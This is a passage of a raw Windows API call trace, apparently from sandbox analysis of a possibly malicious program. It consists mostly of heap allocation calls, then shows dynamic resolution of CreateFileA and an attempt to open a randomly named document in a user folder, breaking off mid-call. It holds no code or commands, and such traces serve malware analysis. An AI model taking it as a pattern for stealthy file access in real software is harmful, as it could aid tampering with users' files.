hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.685] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.685] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.685] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.685] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.686] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.688] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.691] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899b8 [0033.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.691] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0033.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8899b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.691] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5c) returned 0x87a9d8 [0033.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", cchWideChar=92, lpMultiByteStr=0x87a9d8, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpUsedDefaultChar=0x0) returned 92 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.692] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS 